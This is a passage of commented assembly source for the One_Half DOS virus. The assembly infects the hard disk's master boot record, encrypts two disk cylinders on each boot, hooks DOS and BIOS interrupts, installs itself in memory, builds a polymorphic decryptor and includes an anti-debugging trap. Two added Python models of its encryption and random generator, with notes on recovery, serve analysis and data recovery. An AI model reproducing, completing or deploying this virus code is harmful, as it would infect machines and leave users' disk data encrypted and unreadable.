db 00h, 2Eh,0A1h,0A3h, 05h, 26h
db 0C7h
db 'G.com <jmen'
db 0Bh, 26h, 3Ah, 47h, 21h,0BAh
db 4Ah, 05h, 0Fh
db '„_driveru>', 0Ah, 't'
db 0FFh,0C6h, 44h,0FFh, 00h,0B8h
db 03h, 4Bh,0BBh, 80h, 00h, 8Ah
db 0Ch, 0Ah,0C9h,0BAh, 68h, 04h
db 0Fh
db 'ys ...', 0Ah, 0Dh, '$'
db 17h
db 'instalovan'
db 02h,0EBh, 03h,0E9h, 43h, 02h
db 4Eh, 56h, 89h, 36h
;

;
hdr_size_ dw 10h
date_div dw 1Eh
page_size_ dw 200h
;

; Here starts boot_version of One_Half


boot_start:
xor bx, bx
cli
mov sp, 07c00h ; set up stack
mov ss, bx ; 2 0000h:7c00h
sti
mov ds, bx
sub word ptr ds:[413h], 4 ; decrease mem_size by 4 KB
mov cl, 6
int 12h ; gimme mem_size
shl ax, cl ; count the segment
mov dx, 80h ; first harddisk, 0. head
mov es, ax ; my_new_seg 2 es
db 0b9h ; mov cx, ?
viruz_start_sec dw 0bh ; gimme virus_start_sec
mov ax, 0207h ; read 7 secz
push es ; (viruz_body)
int 13h
mov ax, offset the_second_part - p
push ax
retf ; go2 new_segment_part
;
the_second_part:
mov word ptr ds:[21h * 4 + 2], cs; store cs 2 21h * 4 + 2
mov ax, word ptr ds:[46ch] ; gimme tick_counter
push ds
push cs ; make ds = cs
pop ds
mov word ptr ds:[mov_bx_? - p], ax ; store counter
mov ax, cs
inc ax
mov word ptr ds:[_mcb_ + 1 - p], ax ; store block_owner
mov byte ptr ds:[run_jmp - p], 0; zero displ8 2 set our
; own _mcb_ as last_one
call sub_078b ; move presun_rutiny
pop es
mov bx, sp ; 7c00h 2 bx
push es
mov si, word ptr es:[bx+p_] ; gimme cur_cyl_number_
; _2_crypt
db 81h, 0feh ; cmp si, ?
lowest_cyl dw 07h ; less than lowest_cyl ?
jbe loc_06d6
push si ; nope
sub si, 2 ; ok crypt 2 cylinderz
mov word ptr ds:[not_crypt_cyl - p], si ; store cyl - 2
pop si
mov ah, 08h ; gimme drivez_paramz
int 13h
jc loc_06d6 ; error ?
mov al, cl ; gimme max_sec_number
and al, 03fh ; mask off max_sec
mov byte ptr ds:[secz_count - p__], al ; secz_2_crypt
mov cl, 1 ; starting_sec 2 cl
mov bh, 7eh ; buffer_ptr 2 7e00h
mov word ptr ds:[buf_ptr - p__], bx ; store buffer_ptr
mov dl, 80h ; set up drive 2 first harddisk
loc_069E:
dec si ; dec cylinder_number
call sub_0798 ; convert cyl_number
push dx
loc_06A3:
mov ah, 2 ; read 1 cylinder
push ax
int 13h
pop ax
jc short loc_06B4 ; error ?
db 0e8h ; call crypt_
dw offset crypt_ - presun_rutiny + buffer - next_
next_ label near ; crypt_ it
inc ah ; make function 03h
push ax
int 13h ; and write crypted_cyl
pop ax
loc_06B4:
jc short loc_072B ; error ?
test dh, 3Fh ; last head ?
jz short loc_06BF
dec dh ; dec head
jmp short loc_06A3 ; and go on
loc_06BF: ; yope
pop dx
db 81h, 0feh ; cmp si, ?
not_crypt_cyl dw 1bfh ; ok 2 cylinderz crypted_ ?
ja loc_069E
loc_06C6: ; yope
mov bh, 7Ch ; buffer 2 7c00h
mov es:[bx+p_], si ; store new cur_cyl_number_2_
mov ax, 301h ; _crypt
mov cx, 1 ; and write partition_table
mov dh, ch ; (boot_start) back
int 13h
loc_06D6:
mov ds:[cur_cyl_number - p__], si
db 81h, 0feh ; cmp si, ?
one_half_cyl dw 136h ; more than one_half_crypted ?
ja short loc_06E3
call sub_07EC ; ok try 2 write text
loc_06E3: ; nope not yet
mov ax, 201h ; ok now read
mov bx, 7C00h ; 2 buffer 7c00h
mov cx, ds:[viruz_start_sec - p] ; gimme viruz_...
dec cx ; go2 orig_partition_table
mov dx, 80h ; orig_partition_table
int 13h
cli
les ax, dword ptr es:[13h * 4] ; gimme old_int_13h
mov ds:[old_int_13h - p__], ax ; and store it
mov ds:[old_int_13h - p__ + 2], es
pop es
push es
les ax, dword ptr es:[1ch * 4] ; gimme old_int_1ch
mov ds:[old_int_1ch - p], ax ; and store it
mov ds:[old_int_1ch - p + 2], es
pop es
push es ; set up my own
mov word ptr es:[13h * 4], offset new_int_13h - p__
mov word ptr es:[13h * 4 + 2], cs ; new_int_13h
mov word ptr es:[1ch * 4], offset new_int_1ch - p
mov word ptr es:[1ch * 4 + 2], cs ; and new_int_1ch
sti
push bx
retf ; and jump 2 orig_partition

; Diz uncryptz_cylinderz if any error occurez


loc_072B:
xor ah, ah
push ax
int 13h ; try 2 reset the disk
pop ax
loc_0731:
inc dh ; inc head
mov ah, dh ; head 2 ah
pop dx ; pop max_head
push dx
cmp ah, dh ; cmp cur_head with max_head
ja short loc_074E ; above ?
mov dh, ah ; cur_head 2 dh
mov ah, 2 ; read cylinder
push ax
int 13h
pop ax
db 0e8h ; call crypt_
dw offset crypt_ - presun_rutiny + buffer - next__
next__ label near ; uncrypt_ it
inc ah
push ax
int 13h ; and write it back
pop ax
jmp short loc_0731
loc_074E: ; yope (error on first_cyl)
pop dx ; pop max_head
inc si ; inc cyl_number
jmp loc_06C6 ; and end with crypt_

new_int_1ch:
push ax
push ds
push es
xor ax, ax
mov ds, ax
les ax, dword ptr ds:[21h * 4] ; gimme int_21h
mov cs:[old_int_21h - p__], ax ; store offset
mov ax, es ; gimme seg
cmp ax, 800h ; are we under 800h ?
ja short loc_0783
mov word ptr cs:[old_int_21h - p__ + 2], ax ; yope
; we've got dos_int_21h_seg
les ax, dword ptr cs:[old_int_1ch - p]; gimme old_int_1ch
mov ds:[1ch * 4], ax ; restore it back
mov word ptr ds:[1ch * 4 + 2], es
mov word ptr ds:[21h * 4], offset new_int_21h - p;and set up
mov word ptr ds:[21h * 4 + 2], cs ; my new_int_21h
loc_0783: ; nope
pop es
pop ds ; restore regz
pop ax ; and
db 0EAh ; jmp far ptr old_int_1ch
old_int_1ch dw 0FF53h, 0F000h

one_half endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz movez some routinez ...
sub_078B proc near
mov si, offset presun_rutiny - p
mov di, offset buffer - p
mov cx, offset f_read_ - offset presun_rutiny - 4
cld
rep movsb
retn
sub_078B endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz makez from cyl_number_in_si valid cx_reg
sub_0798 proc near
push ax
mov ax, si
mov ch, al
push cx
mov cl, 4
shl ah, cl
pop cx
mov al, 3Fh ; '?'
and dh, al
and cl, al
not al
push ax
and ah, al
or dh, ah
pop ax
shl ah, 1
shl ah, 1
and ah, al
or cl, ah
pop ax
retn
sub_0798 endp
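The boot-sector part above (boot_start through loc_074E) and sub_0798 together define what an infected disk looks like: every boot encrypts two more cylinders, head by head, with the cylinder number packed into the INT 13h registers by sub_0798 and the progress counter written back into the MBR at offset p_. The Python below is an added example for this page, not code from the disassembly. pack_chs/unpack_chs follow sub_0798 bit for bit (cylinder bits 8-9 go to CL bits 6-7 as usual, bits 10-11 go to DH bits 6-7, the head register); boot_pass follows boot_start, loc_069E and loc_06C6. The demo values are the first-generation literals in the listing (mov_ax_? = 265h as the starting counter, lowest_cyl = 7, one_half_cyl = 136h) plus a constructed head count of 15.

```python
"""Model of One_Half's boot-time cylinder encryption and of sub_0798's
register packing.  Added example, not code from the disassembly."""


def pack_chs(cyl, head, sector, drive=0x80):
    """Return (cx, dx) as sub_0798 builds them from si = cyl:
    ch = cyl[7:0], cl[7:6] = cyl[9:8], sector in cl[5:0],
    dh[7:6] = cyl[11:10], head in dh[5:0], drive in dl."""
    if not (0 <= cyl < 0x1000 and 0 <= head < 0x40 and 1 <= sector < 0x40):
        raise ValueError("out of range for 12-bit cylinder CHS")
    ch = cyl & 0xFF
    cl = sector | (((cyl >> 8) & 3) << 6)
    dh = head | (((cyl >> 10) & 3) << 6)
    return (ch << 8) | cl, (dh << 8) | drive


def unpack_chs(cx, dx):
    """Inverse of pack_chs: (cylinder, head, sector) from the register pair."""
    cyl = (cx >> 8) | ((cx & 0xC0) << 2) | ((dx & 0xC000) >> 4)
    return cyl, (dx >> 8) & 0x3F, cx & 0x3F


def boot_pass(cur_cyl, lowest_cyl, max_head, one_half_cyl):
    """One boot: returns (tracks_touched, new_cur_cyl, text_eligible).
    Nothing is encrypted once cur_cyl <= lowest_cyl (jbe loc_06d6); otherwise
    cylinders cur-1 and cur-2 are processed head by head from max_head down
    to 0, and cur-2 is written back into the MBR as the new counter.  The
    'Dis is one half.' text becomes eligible once the counter is <= one_half_cyl
    (the even-day and even-run-counter gates of sub_07EC are not modelled)."""
    if cur_cyl <= lowest_cyl:
        return [], cur_cyl, cur_cyl <= one_half_cyl
    stop_at = cur_cyl - 2                      # not_crypt_cyl
    touched, cyl = [], cur_cyl
    while True:
        cyl -= 1                               # loc_069E: dec si
        for head in range(max_head, -1, -1):   # loc_06A3 .. dec dh
            touched.append((cyl, head))
        if cyl <= stop_at:                     # cmp si, not_crypt_cyl / ja
            break
    return touched, cyl, cyl <= one_half_cyl


def boots_to_finish(cur_cyl, lowest_cyl):
    """Boots until the counter reaches lowest_cyl (two cylinders per boot)."""
    n = 0
    while cur_cyl > lowest_cyl:
        cur_cyl -= 2
        n += 1
    return n


if __name__ == "__main__":
    print([hex(v) for v in pack_chs(0x265, 0, 1)])
    tracks, new_cur, text = boot_pass(0x265, 0x7, 15, 0x136)
    print(len(tracks), "tracks, counter now", hex(new_cur), "text eligible:", text)
    print("boots until the whole range is encrypted:", boots_to_finish(0x265, 0x7))
```

For recovery work the counter is the important number: every cylinder from the value stored in the MBR up to, but not including, the value it started from has already been through crypt_, which is why removing the MBR without first running the cylinders back through the same transform leaves that part of the disk unreadable.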

text_ db 'Dis is one half.', 0Dh, 0Ah, 'Pr'


db 'ess any key to continue ...', 0Dh
db 0Ah

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz writez text if run_counter is even and it iz even day etc.
sub_07EC proc near
mov ah, 4 ; gimme CMOS date_&_time
int 1Ah
jc short loc_ret_0816
test dl, 3 ; day even etc. ?
jnz short loc_ret_0816
test word ptr ds:[run_counter - p], 1; run_counter is even
jnz short loc_ret_0816
mov cx, offset sub_07ec - offset text_; gimme text_length
mov si, offset text_ - p ; gimme text_offset
mov ah, 0Fh ; gimme cur_video_page_number
int 10h ; why ?
mov bl, 7
mov ah, 0Eh ; print char 2 cur_page ...
locloop_080D:
lodsb ; gimme byte
int 10h
loop locloop_080D ; and go on

xor ah, ah ; wait 4 keyprezz


int 16h

loc_ret_0816:
retn ; and end ...
sub_07EC endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz int_21h_file_fc with a handle in bx
sub_0817 proc near
push bx
db 0bbh ; mov bx, ?
handle_ dw 0 ; gimme handle
int 21h ; call int_21h
pop bx
retn ; and end ...
sub_0817 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz int_13h
int_13h proc near
pushf
cli
db 9Ah ; call far ptr int_13h_addr
int_13h_addr dw 774h, 70h
retn
int_13h endp

; This is used for int_13h tracing


new_int_01h:
push bp
mov bp, sp
db 0ebh
jump_patch_? db offset loc_084f - ($ + 1); jmp short loc_084F
db 81h, 7eh, 04h ; cmp word ptr [bp+4], ?
which_segment_? dw 0253h
ja short loc_0853
push ax
push bx
push ds
lds ax, dword ptr [bp+2]
db 0bbh
new_int_01h_mov_bx_? dw 5200h ; mov bx, ?
mov cs:[int_13h_addr - p][bx], ax
mov cs:[int_13h_addr - p + 2][bx], ds
mov byte ptr cs:[jump_patch_? - p][bx], offset loc_084f - (offset jump_patch_? + 1)
pop ds
pop bx
pop ax
loc_084F:
and byte ptr [bp+7], 0FEh
loc_0853:
pop bp
iret

; Diz installz viruz 2 mem


loc_0855:
pop bx ; pop index
pop ax ; pop es_seg
push ax
dec ax ; go2 mcb_block
mov ds, ax ; store it 2 ds
cmp byte ptr ds:[0], 5Ah ; last one ?
jne short loc_08CE
add ax, ds:[3] ; add blockz_size
sub ax, 0FFh ; sub 4 viruz_body
mov dx, cs ; (4 our bufferz etc.)
mov si, bx ; index 2 si
mov cl, 4
shr si, cl ; make paragraphz
add dx, si ; add it 2 cs
db 2eh, 8bh, 0b7h, 1ah, 00h; mov si, cs:[1ah][bx]
; gimme min_mem (from exe_header)
cmp si, 106h
jae short loc_0881
mov si, 106h
loc_0881:
add dx, si ; add min_mem
cmp ax, dx ; less ?
jb short loc_08CE
mov byte ptr ds:[0], 4Dh ; make middle_block
sub word ptr ds:[3], 100h ; sub 100h paragraphz
; (0ffh viruz and 01h _mcb_)
mov ds:[12h], ax ; set new mem_top 2 PSP
mov es, ax ; gimme where_2_move_seg
push cs
pop ds
inc ax
mov ds:[1], ax ; store owner
mov byte ptr [which_jump_? - p][bx], 0EBh
mov si, bx ; gimme index
xor di, di ; move 2 0000h
mov cx, offset buffer - p ; gimme viruz_size
rep movsb ; and finally move
push es
pop ds
call sub_078B ; move presun_rutiny
xor ax, ax
mov ds, ax
cli
mov ax, ds:[21h * 4] ; gimme old_int_21h
mov es:[old_int_21h - p__], ax ; store it
mov ax, word ptr ds:[21h * 4 + 2]
mov es:[old_int_21h - p__ + 2], ax
mov word ptr ds:[21h * 4], offset new_int_21h - p
mov word ptr ds:[21h * 4 + 2], es ; and set my own
sti ; int_21h
loc_08CE:
jmp loc_0A1E ; and go on

; Diz iz the beginning ...


loc_08D1:
call sub_08D4
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_08D4 proc near
pop si
sub si, offset sub_08d4 - p ; count where we are
mov [new_int_01h_mov_bx_? - p][si], si
push es
push si ; si = 582h
cld
inc word ptr [run_counter - p][si]
mov byte ptr [which_jump_? - p][si], 74h
xor ax, ax
mov es, ax
mov ax, es:[46Ch] ; gimme tick_counter
mov [mov_bx_? - p][si], ax ; store it
mov [crypt_value - p][si], ax; 2 timez
mov ax, 4B53h ; am i in mem ?
int 21h
cmp ax, 454Bh ; check mark
je short loc_0965
mov ah, 52h ; nope so go on
int 21h ; gimme list_of_listz_ptr
mov ax, es:[bx-2] ; gimme 1. MCB_segment
mov [which_segment_? - p][si], ax ; store it
mov byte ptr [jump_patch_? - p][si], 0
mov ax, 3501h ; get int_01h
int 21h
push bx ; store it to stack
push es
mov ax, 3513h ; get int_13h
int 21h
mov [int_13h_addr - p][si], bx ; store it to
mov [int_13h_addr - p + 2][si], es; variablez
mov ax, 2501h ; set my int_01h
lea dx, [new_int_01h - p][si]
int 21h
lea bx, [buffer - p][si]
mov cx, 1 ; read partition_table
mov dx, 80h
push cs
pop es
pushf
pop ax
or ah, 1 ; set trap_flag
push ax
popf
mov ax, 201h ; and trace int_13h
call int_13h
pushf
pop ax
and ah, 0FEh ; null trap_flag
push ax
popf
pop ds
pop dx
pushf
mov ax, 2501h ; restore int_01h
int 21h
popf
jc short loc_09C0 ; any errorz ?
push cs
pop ds
cmp word ptr [bx+25h], offset the_second_part - p
jne short loc_0968 ; iz in partition my viruz ?
; (mark)
loc_0965:
jmp loc_0A1D
loc_0968:
cmp word ptr [bx + 180h], 72Eh; next mark
je short loc_09C0
mov ah, 8 ; gimme hard_paramz
mov dl, 80h ; of the first hard disk
call int_13h
jc short loc_09C0 ; error ?
and cx, 3Fh ; mask off max_sector
mov [max_sektor - p][si], cl
mov [max_sektor_2 - p][si], cl
and dh, 3Fh ; mask off headz
mov [max_heads - p][si], dh
mov ax, 301h
sub cl, 7
mov [partition_sec_n - p][si], cl
mov dx, 80h
call int_13h ; write partition_table
jc short loc_09C0 ; error ?
push cx
push dx
push si
xchg di, si
mov cx, 4 ; 4 entryz
add bx, 1EEh ; go2 last_partition_entry
locloop_09A9:
mov al, [bx+4] ; read FAT type
cmp al, 1 ; DOS 12bit ?
je short loc_09C3
cmp al, 4 ; 4 = DOS 16bit ?
jb short loc_09B8 ; 5 = EXTENDED_DOS_PARTITION ?
cmp al, 6 ; 6 = BIGDOS (over 32 MB) ?
jbe short loc_09C3
loc_09B8:
sub bx, 10h ; every record has 10h bytez
loop locloop_09A9

pop si
pop dx
pop cx
loc_09C0:
jmp loc_0855 ; jmp 2 mem_install
loc_09C3:
mov cx, [bx+2] ; gimme boot_start
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
add si, 7 ; make valid cyl_number
mov [lowest_cyl - p][di], si ; store it
xchg si, ax
mov cx, [bx+6] ; gimme end cylinder
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
mov [max_cyl_number - p][di], si; store it
mov [mov_ax_? - p][di], si ; store it
add ax, si
shr ax, 1 ; div with 2
mov [one_half_cyl - p][di], ax; store one_half
pop si
pop dx
pop cx
mov ax, 307h
xchg bx, si
inc cx
mov [viruz_start_sec - p][bx], cx
call int_13h ; write viruz_ body
jc loc_09C0 ; (whole)
lea si, [boot_start - p][bx]; and now move boot
lea di, [buffer - p][bx]
push di
mov cx, offset the_second_part - offset boot_start
rep movsb
db 0b8h ; mov ax, ?
mov_ax_? dw 265h ; store starting_sector_
stosw ; _2_ crypt
mov ax, 301h ; write the new partition_table
pop bx
mov cx, 1
call int_13h
jc loc_09C0 ; error ?
loc_0A1D:
pop bx ; nope
loc_0A1E:
push cs ; dis is a renewal of parts
pop ds ; that were overwritten
push cs ; by decode routine
pop es
db 8Dh,0B7h ; lea si, cs:[overwritt...][bx]
dw offset overwritten_bytez - p
db 81h,0C3h ;add bx, offset decode_...
dw offset decode_routine_table - p
mov cx, 0Ah ; there'z 0ah_partz

locloop_0A2D:
mov di, [bx] ; gimme where_2_move_offset
push cx
mov cx, 0Ah ; every_part haz 0ah bytez
rep movsb
pop cx
inc bx ; go2 next_move_offset
inc bx
loop locloop_0A2D ; and go on

pop es
db 83h,0C3h ; add bx, 0 - (....)
db 0 - (offset beginning_ofs - offset exe_header)
mov di, es ; bx 2 exe_header_offset
add di, 10h ; count start_seg
add [bx+16h], di ; store relo_cs
add [bx+0Eh], di ; store relo_ss
cmp word ptr [bx+6], 0 ; what'bout relo_cnt ?
je short loc_0AB6 ; there'z any ?
mov ds, es:[2ch] ; yope; gimme environment_seg
xor si, si ; start at offset 00h
loc_0A56:
inc si
cmp word ptr [si], 0 ; eof formal_environment ?
jne loc_0A56
add si, 4 ; go2 prog_name
xchg dx, si
mov ax, 3D00h ; open prog_file
int 21h
jc short loc_0ADB ; error ?
push cs
pop ds
mov ds:[handle_ - p - 10h][bx], ax ; store handle_
mov dx, [bx+18h] ; gimme tabl_offset
mov ax, 4200h ; f_ptr 2 it
call sub_0817
push es ; store start_seg
xchg di, ax
loc_0A79:
push ax
lea dx, cs:[reloc_buffer - p - 10h][bx]
mov cx, [bx+6] ; gimme relo_cnt
cmp cx, (name_buffer + 34 - random_number) shr 2
jb short loc_0A8A ; 2 big ?
mov cx, (name_buffer + 34 - random_number) shr 2
; yope gimme max_relo_cnt_now
loc_0A8A:
sub [bx+6], cx ; sub it from relo_cnt
push cx
shl cx, 1 ; mul it with 4
shl cx, 1 ; (segment:offset)
mov ah, 3Fh ; read reloc_table
call sub_0817
jc short loc_0ADB ; error ?
pop cx
pop ax
xchg si, dx

locloop_0A9D:
add [si+2], ax ; make relo_seg
les di, dword ptr [si] ; gimme relo_addr
add es:[di], ax ; and add start_seg
add si, 4 ; go2 next entry
loop locloop_0A9D

cmp word ptr [bx+6], 0 ; relo_cnt is null ?


ja loc_0A79 ; if yope go on
pop es ; nope
mov ah, 3Eh ; so close_file
call sub_0817
loc_0AB6: ; nope
push es
pop ds
cmp byte ptr cs:[bx+12h], 0 ; com_file ?
jne short loc_0ACC
mov si, bx ; gimme exe_header_offset
mov di, 100h
mov cx, 3 ; move 3 bytez 2 100h
rep movsb
pop ax
jmp short loc_0AD7 ; and go on
loc_0ACC: ; nope it'z exe_file
pop ax
cli
mov sp, cs:[bx+10h] ; gimme sp
mov ss, cs:[bx+0Eh] ; gimme ss
sti
loc_0AD7:
jmp dword ptr cs:[bx+14h] ; finally jmp 2 real_prog_start
loc_0ADB:
mov ah, 4Ch ; there waz an error !
int 21h
;
reloc_buffer label near
;

; in : dx = max_number
; out : dx = random_number
random_number:
mov cs:[mov_si_? - p], si
push ax
push bx
push cx
push dx
db 0b9h ; mov cx, ?
mov_cx_? dw 0b0d4h
db 0bbh ; mov bx, ?
mov_bx_? dw 6210h
mov dx, 15Ah
mov ax, 4E35h
xchg si, ax
xchg dx, ax
test ax, ax
jz short loc_0AFC
mul bx
loc_0AFC:
jcxz short loc_0B03
xchg cx, ax
mul si
add ax, cx
loc_0B03:
xchg si, ax
mul bx
add dx, si
inc ax
adc dx, 0
mov cs:[mov_bx_? - p], ax
mov cs:[mov_cx_? - p], dx
mov ax, dx
pop cx
xor dx, dx
jcxz short loc_0B1E
div cx
loc_0B1E:
pop cx
pop bx
pop ax
pop si
push si
cmp byte ptr cs:[si], 0CCh ; there'z a breakpoint ?
loc_0B27:
je loc_0B27 ; if yope stay in loop
; (nice_try ...)
db 0beh ; mov si, ?
mov_si_? dw 5cbh
retn
sub_08D4 endp

; decode_routine haz 10 piecez ... (10 instructionz)


;
instr_start:
db 01h ; instruction_length
db 50h ; push ?_reg
;
db 01h ; instruction_length
push_what db 0eh ; push cs or push ss
;
db 01h ; instruction_length
db 1fh ; pop ds
;
db 03h ; instruction_length
mov_index_? db 0bfh ; mov ?_index_reg, im16
viruz_start dw 0582h ; im16
;
db 03h ; instruction_length
mov_?_instr db 0b8h ; mov ?_reg, im16
crypt_viruz_value dw 0bfbah ; im16
;
db 02h ; instruction_length
db 31h ; xor [index_reg], ?_reg
xor_?_instr db 05h ; ModR/M
;
db 04h ; instruction_length
db 81h ; add ?_reg, im16
add_?_instr db 0c0h ; ModR/M, opcode
next_crypt_value_ dw 6efeh ; im16
;
db 01h ; instruction_length
inc_?_instr db 47h ; inc ?_reg
;
db 04h ; instruction_length
db 81h ; cmp ?_index_reg, im16
cmp_index_? db 0ffh ; ModR/M, opcode
viruz_end dw 135ah ; im16
;
db 02h ; instruction_length
db 75h ; jnz disp8
db 0efh
;

;
unimportant_instr:
;
nop
stc
clc
sti
db 2Eh ; cs:
db 36h ; ss:
db 3Eh ; ds:
cld
std
cmc
;

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz movez unimportant_instr 2 buffer
; in : dx = how many :-)
sub_0B57 proc near
or dx, dx ; count is null ?
jz short loc_ret_0B71
push si
push cx ; push regz
push dx
mov cx, dx ; count 2 cx
locloop_0B60:
mov si, offset unimportant_instr - p
mov dx, 0Ah ; max_random 2 0ah (10 instr)
call random_number ; gimme random_number
add si, dx ; go2 instruction
movsb ; move it
loop locloop_0B60 ; and go on

pop dx
pop cx ; restore regz
pop si

loc_ret_0B71:
retn ; and end ...
sub_0B57 endp
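random_number, unimportant_instr and sub_0B57 above are the whole source of variation in One_Half's decryptor, and instr_start fixes what the decryptor actually computes. The Python below is an added example for this page, not code from the disassembly. It re-expresses three things: random_number as the 32-bit LCG seed = seed * 015A4E35h + 1 kept in the self-modified word pair mov_cx_?:mov_bx_? (only the low word is refreshed from the BIOS tick count at 0040:006C in sub_08D4), returning the high word modulo dx; sub_0B57's junk selection from the ten unimportant_instr bytes; and the `xor [idx], reg / add reg, imm / inc idx / cmp idx, end / jnz` loop of instr_start as sliding_xor(). The key 0BFBAh and step 6EFEh used in the demo are the values in the first-generation chunks at loc_049b and loc_0168; the sample body is constructed.

```python
"""One_Half's random_number, junk picker and decode loop in Python.
Added example, not code from the disassembly."""
MULT = 0x015A4E35
# unimportant_instr: nop stc clc sti cs: ss: ds: cld std cmc
JUNK = bytes([0x90, 0xF9, 0xF8, 0xFB, 0x2E, 0x36, 0x3E, 0xFC, 0xFD, 0xF5])


class OneHalfRng:
    """random_number: in dx = maximum, out dx = value.  The seed lives in the
    two self-modified words mov_cx_? (high) and mov_bx_? (low)."""

    def __init__(self, lo=0x6210, hi=0x0B0D4):      # defaults from the listing
        self.seed = ((hi & 0xFFFF) << 16) | (lo & 0xFFFF)

    def next(self, maximum):
        self.seed = (self.seed * MULT + 1) & 0xFFFFFFFF   # 32-bit product via 3 muls
        high = self.seed >> 16                            # mov ax, dx
        # xor dx,dx / jcxz: a maximum of 0 skips the div, so the result is 0
        return high % maximum if maximum else 0


def junk_bytes(rng, count):
    """sub_0B57: 'count' bytes drawn from unimportant_instr with random_number(10)."""
    return bytes(JUNK[rng.next(len(JUNK))] for _ in range(count))


def sliding_xor(body, key, step):
    """The decode loop: xor word ptr [idx], key ; add key, step ; inc idx, run
    for every byte offset from viruz_start up to (not including) viruz_end, so
    consecutive words overlap by one byte.  Each byte is xored with values that
    depend only on its position, so the transform is an involution: applying it
    twice restores the input, which is what makes the virus 'reversible'."""
    out = bytearray(body)
    k = key & 0xFFFF
    for i in range(len(out) - 1):
        w = (out[i] | (out[i + 1] << 8)) ^ k
        out[i], out[i + 1] = w & 0xFF, w >> 8
        k = (k + step) & 0xFFFF
    return bytes(out)


if __name__ == "__main__":
    print("junk:", junk_bytes(OneHalfRng(), 12).hex())
    body = bytes(range(32))                          # constructed 'virus body'
    enc = sliding_xor(body, 0xBFBA, 0x6EFE)
    print("round trip ok:", sliding_xor(enc, 0xBFBA, 0x6EFE) == body)
```

Two consequences for analysis follow directly. Because the junk and chunk placement are driven by this generator, a given seed reproduces the whole decryptor layout, so an emulator that knows the seed words can regenerate rather than guess. And the epilogue of random_number (the extra `pop si` that fetches the return address and the `cmp byte ptr cs:[si], 0CCh` / `je $` pair) is an anti-debugging check: a software breakpoint placed on the instruction after any `call random_number` makes the sample spin forever, so single-stepping or hardware breakpoints are the way to trace it.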

